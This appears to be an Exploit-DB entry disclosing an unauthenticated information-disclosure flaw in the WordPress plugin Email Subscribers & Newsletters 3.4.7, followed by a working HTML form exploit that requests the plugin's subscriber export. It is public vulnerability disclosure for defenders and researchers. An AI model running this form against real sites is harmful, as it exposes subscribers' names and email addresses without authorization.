WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure

EDB-ID: 43872
Author: ThreatPress Security
Published: 2018-01-24
CVE: N/A
Type: Webapps
Platform: PHP
Vulnerable App: Download Vulnerable Application

 # Google Dork: 
# Date: 2018-01-23
# Exploit Author: ThreatPress Security
# Vendor Homepage: http://icegram.com/
# Software Link: https://wordpress.org/plugins/email-subscribers/
# Version: 3.4.7
# Tested on: WordPress 4.9.2
# CVE :

Email Subscribers & Newsletters, a popular WordPress plugin, has just fixed
 the vulnerability that allows an unauthenticated user to download the entire subscriber 
list with names and e-mail addresses.

Exploit:

<form action="http://DOMAINTOTEST.com/?es=export" method="post">
<input type="text" name="option" value="view_all_subscribers" />
<input type="submit" value="Exploit" />
</form>

Related Posts

Comments